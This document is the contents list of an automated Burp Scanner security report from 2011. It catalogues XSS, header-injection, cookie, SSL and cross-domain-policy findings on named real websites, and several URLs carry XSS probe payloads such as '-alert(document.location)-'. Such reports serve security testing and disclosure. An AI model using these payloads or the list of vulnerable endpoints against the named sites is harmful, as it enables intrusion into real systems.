XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09062011-01

Report generated by Burp Scanner at Tue Sep 06 11:57:40 GMT-06:00 2011.


Contents

1. HTTP header injection

1.1. http://40.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

1.2. http://40.xg4ken.com/media/redir.php [url[] parameter]

1.3. http://pixel.everesttech.net/2565/c [url parameter]

1.4. http://redirect.rtrk.com/redirect [RL_ckstr parameter]

1.5. http://redirect.rtrk.com/redirect [RL_qstr parameter]

1.6. http://redirect.rtrk.com/redirect [RL_rurl parameter]

1.7. http://udmserve.net/udm/img.fetch [dt cookie]

1.8. http://utdi.reachlocal.net/images/Bottom_facebook.jpg [REST URL parameter 1]

1.9. http://utdi.reachlocal.net/images/Rsidepanel_CSportalHead.jpg [REST URL parameter 1]

1.10. http://utdi.reachlocal.net/images/Rsidepanel_ID-contact.jpg [REST URL parameter 1]

1.11. http://utdi.reachlocal.net/images/Rsidepanel_ID-pr.jpg [REST URL parameter 1]

1.12. http://utdi.reachlocal.net/images/Rsidepanel_ID-specials.jpg [REST URL parameter 1]

1.13. http://utdi.reachlocal.net/images/Rsidepanel_UTDI-G.jpg [REST URL parameter 1]

1.14. http://utdi.reachlocal.net/images/Rsidepanel_UTDiStore.jpg [REST URL parameter 1]

1.15. http://utdi.reachlocal.net/images/Rsidepanel_btm.jpg [REST URL parameter 1]

1.16. http://utdi.reachlocal.net/images/Rsidepanel_mid-specials.jpg [REST URL parameter 1]

1.17. http://utdi.reachlocal.net/images/Rsidepanel_mid.jpg [REST URL parameter 1]

1.18. http://utdi.reachlocal.net/images/back-front.jpg [REST URL parameter 1]

1.19. http://utdi.reachlocal.net/images/banr_techcorner.jpg [REST URL parameter 1]

1.20. http://utdi.reachlocal.net/images/box-1.jpg [REST URL parameter 1]

1.21. http://utdi.reachlocal.net/images/box-enews.jpg [REST URL parameter 1]

1.22. http://utdi.reachlocal.net/images/gpx_avaya_ip500sml.jpg [REST URL parameter 1]

1.23. http://utdi.reachlocal.net/images/icon_orangecheckball.gif [REST URL parameter 1]

1.24. http://utdi.reachlocal.net/images/logo-cisco-webex-main.gif [REST URL parameter 1]

1.25. http://utdi.reachlocal.net/images/logo_carousel.jpg [REST URL parameter 1]

1.26. http://utdi.reachlocal.net/images/logo_cisco_footer.jpg [REST URL parameter 1]

1.27. http://utdi.reachlocal.net/images/logo_nortel4.jpg [REST URL parameter 1]

1.28. http://utdi.reachlocal.net/images/mainhead_partners.jpg [REST URL parameter 1]

1.29. http://utdi.reachlocal.net/images/mainhead_smartbuys.jpg [REST URL parameter 1]

1.30. http://utdi.reachlocal.net/images/mainpic_blueguy.jpg [REST URL parameter 1]

1.31. http://utdi.reachlocal.net/images/mainpic_blueheadline.jpg [REST URL parameter 1]

1.32. http://utdi.reachlocal.net/images/navbutton_about-ovr.jpg [REST URL parameter 1]

1.33. http://utdi.reachlocal.net/images/navbutton_about.jpg [REST URL parameter 1]

1.34. http://utdi.reachlocal.net/images/navbutton_client-ovr.jpg [REST URL parameter 1]

1.35. http://utdi.reachlocal.net/images/navbutton_client.jpg [REST URL parameter 1]

1.36. http://utdi.reachlocal.net/images/navbutton_contact-ovr.jpg [REST URL parameter 1]

1.37. http://utdi.reachlocal.net/images/navbutton_contact.jpg [REST URL parameter 1]

1.38. http://utdi.reachlocal.net/images/navbutton_products-ovr.jpg [REST URL parameter 1]

1.39. http://utdi.reachlocal.net/images/navbutton_products.jpg [REST URL parameter 1]

1.40. http://utdi.reachlocal.net/images/navbutton_projects-ovr.jpg [REST URL parameter 1]

1.41. http://utdi.reachlocal.net/images/navbutton_projects.jpg [REST URL parameter 1]

1.42. http://utdi.reachlocal.net/images/navbutton_services-ovr.jpg [REST URL parameter 1]

1.43. http://utdi.reachlocal.net/images/navbutton_services.jpg [REST URL parameter 1]

1.44. http://utdi.reachlocal.net/images/partner-logos-avaya.jpg [REST URL parameter 1]

1.45. http://utdi.reachlocal.net/images/partner-logos-sonexis.jpg [REST URL parameter 1]

1.46. http://utdi.reachlocal.net/images/productpic_avaya1.jpg [REST URL parameter 1]

1.47. http://utdi.reachlocal.net/images/spacer.gif [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.agkn.com/iframe!t=1129! [clk1 parameter]

2.2. http://ad.agkn.com/iframe!t=1129! [mt_adid parameter]

2.3. http://ad.agkn.com/iframe!t=1129! [mt_id parameter]

2.4. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]

2.5. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]

2.6. http://ad.agkn.com/iframe!t=1129! [redirect parameter]

2.7. http://ad.agkn.com/iframe!t=1131! [clk1 parameter]

2.8. http://ad.agkn.com/iframe!t=1131! [mt_adid parameter]

2.9. http://ad.agkn.com/iframe!t=1131! [mt_id parameter]

2.10. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

2.11. http://ad.agkn.com/iframe!t=1131! [name of an arbitrarily supplied request parameter]

2.12. http://ad.agkn.com/iframe!t=1131! [redirect parameter]

2.13. http://ads.media.net/medianet.php [size parameter]

2.14. http://ads.pointroll.com/PortalServe/ [r parameter]

2.15. http://ads.pointroll.com/PortalServe/ [redir parameter]

2.16. http://ads.pointroll.com/PortalServe/ [time parameter]

2.17. http://adserver.teracent.net/tase/ad [name of an arbitrarily supplied request parameter]

2.18. http://adserver.teracent.net/tase/ad [rcu parameter]

2.19. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 2]

2.20. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 3]

2.21. http://comcast-www.baynote.net/baynote/tags3/guide/results-xsl/comcast-www [elementIds parameter]

2.22. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard [mbox parameter]

2.23. http://event.adxpose.com/event.flow [uid parameter]

2.24. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]

2.25. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]

2.26. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]

2.27. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 1]

2.28. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 2]

2.29. http://frontier.com/BillPay/Login.aspx [REST URL parameter 1]

2.30. http://frontier.com/BillPay/Login.aspx [REST URL parameter 2]

2.31. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]

2.32. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

2.33. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

2.34. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 1]

2.35. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 2]

2.36. http://frontier.com/Images/2011promo/bg-grey.jpg [REST URL parameter 3]

2.37. http://frontier.com/Images/2011promo/bg-grey.jpg [name of an arbitrarily supplied request parameter]

2.38. http://frontier.com/Shop/Login.aspx [REST URL parameter 1]

2.39. http://frontier.com/Shop/Login.aspx [REST URL parameter 2]

2.40. http://frontier.com/winwin1 [REST URL parameter 1]

2.41. http://frontier.com/winwin1 [mkwid parameter]

2.42. http://frontier.com/winwin1 [name of an arbitrarily supplied request parameter]

2.43. http://frontier.com/winwin1 [pcrid parameter]

2.44. http://games.frontier.com/WebAnalysis/APP/GenerateCode.ashx [lc parameter]

2.45. http://ib.adnxs.com/seg [redir parameter]

2.46. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpck parameter]

2.47. http://img.mediaplex.com/content/0/3484/103250/GGGreen_Flash_300x250_LPC.js [mpvc parameter]

2.48. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]

2.49. http://postcalc.usps.gov/CombineScriptsHandler.ashx [_TSM_HiddenField_ parameter]

2.50. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]

2.51. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]

2.52. http://show.partners-z.com/s/show [name of an arbitrarily supplied request parameter]

2.53. http://utdi.reachlocal.com/coupon/ [cid parameter]

2.54. http://utdi.reachlocal.com/coupon/ [dynamic_proxy parameter]

2.55. http://utdi.reachlocal.com/coupon/ [kw parameter]

2.56. http://utdi.reachlocal.com/coupon/ [name of an arbitrarily supplied request parameter]

2.57. http://utdi.reachlocal.com/coupon/ [primary_serv parameter]

2.58. http://utdi.reachlocal.com/coupon/ [pub_cr_id parameter]

2.59. http://utdi.reachlocal.com/coupon/ [rl_key parameter]

2.60. http://utdi.reachlocal.com/coupon/ [scid parameter]

2.61. http://utdi.reachlocal.com/coupon/ [se_refer parameter]

2.62. http://utdi.reachlocal.com/coupon/ [tc parameter]

2.63. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [cid parameter]

2.64. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [dynamic_proxy parameter]

2.65. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [kw parameter]

2.66. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [name of an arbitrarily supplied request parameter]

2.67. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [primary_serv parameter]

2.68. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [pub_cr_id parameter]

2.69. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_key parameter]

2.70. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [rl_track_landing_pages parameter]

2.71. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [scid parameter]

2.72. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [se_refer parameter]

2.73. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [tc parameter]

2.74. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]

2.75. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]

2.76. http://www.frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]

2.77. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [REST URL parameter 1]

2.78. http://www.frontier.com/AgentOrderingcf4af%27-alert(1)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]

2.79. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [REST URL parameter 1]

2.80. http://www.frontier.com/AgentOrderingcf4af%27-alert(document.location)-%279ff1a208c26e1167 [name of an arbitrarily supplied request parameter]

2.81. http://www.frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]

2.82. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

2.83. http://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

2.84. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 1]

2.85. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 2]

2.86. http://www.frontier.com/Images/Common/form_bg.gif [REST URL parameter 3]

2.87. http://www.frontier.com/Images/Common/form_bg.gif [name of an arbitrarily supplied request parameter]

2.88. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 1]

2.89. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 2]

2.90. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 1]

2.91. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 2]

2.92. https://www.frontier.com/AgentOrdering/Login/ [name of an arbitrarily supplied request parameter]

2.93. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 1]

2.94. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 2]

2.95. https://www.frontier.com/BillPay/Login.aspx [REST URL parameter 1]

2.96. https://www.frontier.com/BillPay/Login.aspx [name of an arbitrarily supplied request parameter]

2.97. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

2.98. https://www.frontier.com/Controls/VirtualCode.ashx [REST URL parameter 2]

2.99. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]

2.100. https://www.frontier.com/Shop/Login.aspx [REST URL parameter 1]

2.101. https://www.frontier.com/Shop/Login.aspx [name of an arbitrarily supplied request parameter]

2.102. http://www.myfitv.com/search [query parameter]

2.103. http://www.vonage.com/search.php [lang_cntry parameter]

2.104. http://www.vonage.com/search.php [name of an arbitrarily supplied request parameter]

2.105. http://www.vonage.com/search.php [q parameter]

2.106. http://www.vonage.com/search.php [q parameter]

2.107. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

2.108. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

2.109. http://www.whitefence.com/category/high-speed-internet/ [REST URL parameter 2]

2.110. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

2.111. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

2.112. http://www.whitefence.com/category/home-phone/ [REST URL parameter 2]

2.113. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

2.114. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

2.115. http://www.whitefence.com/category/service-tips/ [REST URL parameter 2]

2.116. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

2.117. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

2.118. http://www.whitefence.com/category/television-service/ [REST URL parameter 2]

2.119. http://yp.frontierpages.com/results.aspx [term parameter]

2.120. http://zip4.usps.com/zip4/zcl_1_results.jsp [state parameter]

2.121. http://sitesearch.comcast.com/ [Referer HTTP header]

2.122. http://www.whitefence.com/category/high-speed-internet/ [Referer HTTP header]

2.123. http://www.whitefence.com/category/home-phone/ [Referer HTTP header]

2.124. http://www.whitefence.com/category/television-service/ [Referer HTTP header]

2.125. http://frontier.my.yahoo.com/ [B cookie]

2.126. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js [ruid cookie]

2.127. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js [ruid cookie]

2.128. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js [ruid cookie]

2.129. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js [ruid cookie]

2.130. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

2.131. http://utdi.reachlocal.net/index.html [RlocalUID cookie]

2.132. http://www.frontierpages.com/ [FrontierPages cookie]

2.133. http://www.frontierpages.com/ [FrontierPages cookie]

2.134. http://www.frontierpages.com/region.asp [FrontierPages cookie]

2.135. http://www.frontierpages.com/region.asp [FrontierPages cookie]

3. Flash cross-domain policy

3.1. http://40.xg4ken.com/crossdomain.xml

3.2. http://ad.agkn.com/crossdomain.xml

3.3. http://ad.turn.com/crossdomain.xml

3.4. http://admin.brightcove.com/crossdomain.xml

3.5. http://ads.media.net/crossdomain.xml

3.6. http://ads.pointroll.com/crossdomain.xml

3.7. http://ads.yimg.com/crossdomain.xml

3.8. http://ads.yldmgrimg.net/crossdomain.xml

3.9. http://adserver.teracent.net/crossdomain.xml

3.10. http://altfarm.mediaplex.com/crossdomain.xml

3.11. http://api.facebook.com/crossdomain.xml

3.12. http://as.casalemedia.com/crossdomain.xml

3.13. http://as1.suitesmart.com/crossdomain.xml

3.14. http://b.scorecardresearch.com/crossdomain.xml

3.15. http://by.optimost.com/crossdomain.xml

3.16. http://cdn.turn.com/crossdomain.xml

3.17. http://cimage.adobe.com/crossdomain.xml

3.18. http://citizenstelecom.112.2o7.net/crossdomain.xml

3.19. http://comcastresidentialservices.tt.omtrdc.net/crossdomain.xml

3.20. http://cr0.worthathousandwords.com/crossdomain.xml

3.21. http://d.yimg.com/crossdomain.xml

3.22. http://e.yimg.com/crossdomain.xml

3.23. http://ec.atdmt.com/crossdomain.xml

3.24. http://ehg-verizon.hitbox.com/crossdomain.xml

3.25. http://event.adxpose.com/crossdomain.xml

3.26. http://event.rtrk.com/crossdomain.xml

3.27. http://external.ak.fbcdn.net/crossdomain.xml

3.28. http://g-pixel.invitemedia.com/crossdomain.xml

3.29. http://iar.worthathousandwords.com/crossdomain.xml

3.30. http://ib.adnxs.com/crossdomain.xml

3.31. http://img.mediaplex.com/crossdomain.xml

3.32. http://int.teracent.net/crossdomain.xml

3.33. http://integrate.112.2o7.net/crossdomain.xml

3.34. http://l.yimg.com/crossdomain.xml

3.35. http://landing.optionshouse.com/crossdomain.xml

3.36. http://log30.doubleverify.com/crossdomain.xml

3.37. http://metrics.scottrade.com/crossdomain.xml

3.38. http://metrics.vonage.com/crossdomain.xml

3.39. http://pixel.everesttech.net/crossdomain.xml

3.40. http://pixel.fetchback.com/crossdomain.xml

3.41. http://pixel.invitemedia.com/crossdomain.xml

3.42. http://pixel.quantserve.com/crossdomain.xml

3.43. http://presence.apizone.betaregion.oberon-media.com/crossdomain.xml

3.44. http://query.yahooapis.com/crossdomain.xml

3.45. http://r.casalemedia.com/crossdomain.xml

3.46. http://redirect.rtrk.com/crossdomain.xml

3.47. http://s0.2mdn.net/crossdomain.xml

3.48. http://segment-pixel.invitemedia.com/crossdomain.xml

3.49. http://sensor2.suitesmart.com/crossdomain.xml

3.50. http://serviceo.comcast.net/crossdomain.xml

3.51. http://spe.atdmt.com/crossdomain.xml

3.52. http://speed.pointroll.com/crossdomain.xml

3.53. http://t.invitemedia.com/crossdomain.xml

3.54. http://t.pointroll.com/crossdomain.xml

3.55. http://tags.bluekai.com/crossdomain.xml

3.56. http://utdi.reachlocal.com/crossdomain.xml

3.57. http://utdi.reachlocal.net/crossdomain.xml

3.58. http://whitefence.112.2o7.net/crossdomain.xml

3.59. http://www.burstnet.com/crossdomain.xml

3.60. http://www.myfitv.com/crossdomain.xml

3.61. http://www.zillow.com/crossdomain.xml

3.62. http://www2.whitefence.com/crossdomain.xml

3.63. http://yql.yahooapis.com/crossdomain.xml

3.64. http://a.adready.com/crossdomain.xml

3.65. http://ads.bridgetrack.com/crossdomain.xml

3.66. http://espanol.vonage.com/crossdomain.xml

3.67. http://finance.yahoo.com/crossdomain.xml

3.68. http://frontier.my.yahoo.com/crossdomain.xml

3.69. http://geo.yahoo.com/crossdomain.xml

3.70. http://gws.maps.yahoo.com/crossdomain.xml

3.71. http://maps.yahoo.com/crossdomain.xml

3.72. http://media.sonypictures.com/crossdomain.xml

3.73. http://mi.adinterax.com/crossdomain.xml

3.74. http://movies.yahoo.com/crossdomain.xml

3.75. http://music.yahoo.com/crossdomain.xml

3.76. http://new.music.yahoo.com/crossdomain.xml

3.77. http://omg.yahoo.com/crossdomain.xml

3.78. http://optimized-by.rubiconproject.com/crossdomain.xml

3.79. http://pagead2.googlesyndication.com/crossdomain.xml

3.80. http://realestate.yahoo.com/crossdomain.xml

3.81. http://scottrade.wsod.com/crossdomain.xml

3.82. http://search.yahoo.com/crossdomain.xml

3.83. http://shopping.yahoo.com/crossdomain.xml

3.84. http://sports.yahoo.com/crossdomain.xml

3.85. http://static.ak.fbcdn.net/crossdomain.xml

3.86. https://us.etrade.com/crossdomain.xml

3.87. http://video.music.yahoo.com/crossdomain.xml

3.88. http://www.comcast.net/crossdomain.xml

3.89. http://www.facebook.com/crossdomain.xml

3.90. http://www.fidelity.com/crossdomain.xml

3.91. https://www.fidelity.com/crossdomain.xml

3.92. http://www.pgatour.com/crossdomain.xml

3.93. http://xfinity.comcast.net/crossdomain.xml

3.94. http://www.vonage.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ads.pointroll.com/clientaccesspolicy.xml

4.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

4.3. http://citizenstelecom.112.2o7.net/clientaccesspolicy.xml

4.4. http://ec.atdmt.com/clientaccesspolicy.xml

4.5. http://integrate.112.2o7.net/clientaccesspolicy.xml

4.6. http://metrics.scottrade.com/clientaccesspolicy.xml

4.7. http://metrics.vonage.com/clientaccesspolicy.xml

4.8. http://pixel.quantserve.com/clientaccesspolicy.xml

4.9. http://s0.2mdn.net/clientaccesspolicy.xml

4.10. http://serviceo.comcast.net/clientaccesspolicy.xml

4.11. http://spe.atdmt.com/clientaccesspolicy.xml

4.12. http://speed.pointroll.com/clientaccesspolicy.xml

4.13. http://whitefence.112.2o7.net/clientaccesspolicy.xml

4.14. http://www.fidelity.com/clientaccesspolicy.xml

4.15. https://www.fidelity.com/clientaccesspolicy.xml

5. SSL cookie without secure flag set

5.1. https://go.ooma.com/activate

5.2. https://go.ooma.com/activate/activation_code

5.3. https://www.fidelity.com/welcome/200-free-trades

5.4. https://www.comcast.com/Localization/Localize.cspx

5.5. https://www.comcast.com/includes/js/IDGenerator.ashx

6. Session token in URL

6.1. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard

6.2. https://login.comcast.net/myaccount/lookup

6.3. http://omg.yahoo.com/

6.4. http://omg.yahoo.com/xhr/ad/LREC/2115806991

6.5. http://www.facebook.com/extern/login_status.php

6.6. http://www.websitealive9.com/2140/visitor/vTrackerSrc_v2.asp

7. SSL certificate

7.1. https://login.yahoo.com/

7.2. https://www.comcastsupport.com/

7.3. https://www.frontier.com/

7.4. https://customer.comcast.com/

7.5. https://go.ooma.com/

7.6. https://login.aptela.com/

7.7. https://login.comcast.net/

7.8. https://login.frontier.com/

7.9. https://login.frontiermobile.com/

7.10. https://us.etrade.com/

7.11. https://www.comcast.com/

7.12. https://www.fidelity.com/

7.13. https://www.frontiermobile.com/

7.14. https://www.optionshouse.com/

7.15. https://www.usps.com/

8. Password field submitted using GET method

9. Cookie scoped to parent domain

9.1. http://pixel.everesttech.net/2565/c

9.2. http://pixel.everesttech.net/2565/i

9.3. http://40.xg4ken.com/media/redir.php

9.4. http://ad.agkn.com/iframe!t=1129!

9.5. http://ad.agkn.com/iframe!t=1131!

9.6. http://ads.lucidmedia.com/clicksense/pixel

9.7. http://ads.pointroll.com/PortalServe/

9.8. http://adserver.teracent.net/tase/ad

9.9. http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

9.10. http://ak1.abmr.net/is/www.burstnet.com

9.11. http://b.scorecardresearch.com/b

9.12. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fRXhwYW5kYWJsZV85NTR4NjBfQWRJbnRlcmF4LGN0JDM2LGR0KHR5JHJtLGNpKHBpZCRZYWhvbyxjaWQkeWFob29ob3VzZSxjbXBpZCRNYWlsLGtpZCQzMDc4MDgxKSxjZCh0aW1lJDAsdHlwZSRpbikodGltZSQwLHR5cGUkdGkpKSk/1

9.13. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRVTVVfWWFob29fTW92aWVzX1RyYW5zcGFyZW50UHVycGxlXzA3MDYxMSxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkVU1VLGtpZCQxMDcxOTI5KSxjZCh0aW1lJDAsdHlwZSR0aSxzZXEkMCkodGltZSQwLHR5cGUkYWksc2VxJDApKSk/1

9.14. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

9.15. http://ehg-verizon.hitbox.com/HG

9.16. http://espanol.vonage.com/mpel.js

9.17. http://external.dmtracker.com/tags/vs.js

9.18. http://forums.comcast.com/t5/Customer-Service/GamePass-cancellation-and-e-mail-response-times/m-p/779431

9.19. http://forums.comcast.com/t5/image/serverpage/avatar-name/teddy/avatar-theme/vintage/avatar-collection/toys/avatar-display-size/message

9.20. http://forums.comcast.com/t5/image/serverpage/image-id/1809i073114C17A65519C/image-dimensions/64x36

9.21. http://frontier.my.yahoo.com/

9.22. http://frontier.my.yahoo.com/e/js

9.23. http://gdyn.pgatour.com/1.1/1.gif

9.24. http://ib.adnxs.com/seg

9.25. http://id.google.com/verify/EAAAAAcJfsVcWEi1PTv691pGpQk.gif

9.26. http://int.teracent.net/tase/int

9.27. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

9.28. http://optimized-by.rubiconproject.com/a/6348/9844/15925-15.js

9.29. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js

9.30. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js

9.31. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js

9.32. http://optimized-by.rubiconproject.com/a/dk.js

9.33. http://pixel.fetchback.com/serve/fb/pdc

9.34. http://pixel.quantserve.com/api/segments.json

9.35. http://pixel.quantserve.com/pixel

9.36. http://r1-ads.ace.advertising.com/site=766755/size=180150/u=2/bnum=73910453/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

9.37. http://r1-ads.ace.advertising.com/site=790042/size=180150/u=2/bnum=62371385/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fsports.yahoo.com%252Fnfl%252Fblog%252Fshutdown_corner%252Fpost%252FTiki-Barber-remains-unemployed-and-sad%253Furn%253Dnfl-wp6443

9.38. http://redirect.rtrk.com/redirect

9.39. http://sales.liveperson.net/hc/21807557/

9.40. http://sensor2.suitesmart.com/sensor4.js

9.41. http://testdm.travelers.com/trvwics.gif

9.42. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

9.43. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

9.44. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

9.45. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

9.46. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

9.47. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

9.48. http://utdi.reachlocal.com/

9.49. http://utdi.reachlocal.net/index.html

9.50. http://www.burstnet.com/enlightn/8117/3E06/

9.51. https://www.comcast.com/Localization/Localize.cspx

9.52. http://www.zillow.com/app

10. Cookie without HttpOnly flag set

10.1. http://ads.adxpose.com/ads/ads.js

10.2. http://event.adxpose.com/event.flow

10.3. http://pixel.everesttech.net/2565/c

10.4. http://pixel.everesttech.net/2565/i

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp

10.6. https://www.fidelity.com/welcome/200-free-trades

10.7. http://www.frontierhelp.com/

10.8. http://www.whitefence.com/a

10.9. http://40.xg4ken.com/media/redir.php

10.10. http://ad.agkn.com/iframe!t=1129!

10.11. http://ad.agkn.com/iframe!t=1131!

10.12. http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**

10.13. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

10.14. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

10.15. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

10.16. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313297**

10.17. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313288**

10.18. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/1315313297**

10.19. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/474.207.tk.TEXT/1315313093322187

10.20. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/675.22.tk.120x301315313093322187

10.21. http://ad.yieldmanager.com/iframe3

10.22. http://ad.yieldmanager.com/iframe3

10.23. http://ad.yieldmanager.com/iframe3

10.24. http://ad.yieldmanager.com/imp

10.25. http://ad.yieldmanager.com/imp

10.26. http://ad.yieldmanager.com/imp

10.27. http://ad.yieldmanager.com/pixel

10.28. http://ads.bridgetrack.com/site/rtgt.asp

10.29. http://ads.lucidmedia.com/clicksense/pixel

10.30. http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313417155568&transactionID=1315313417155568

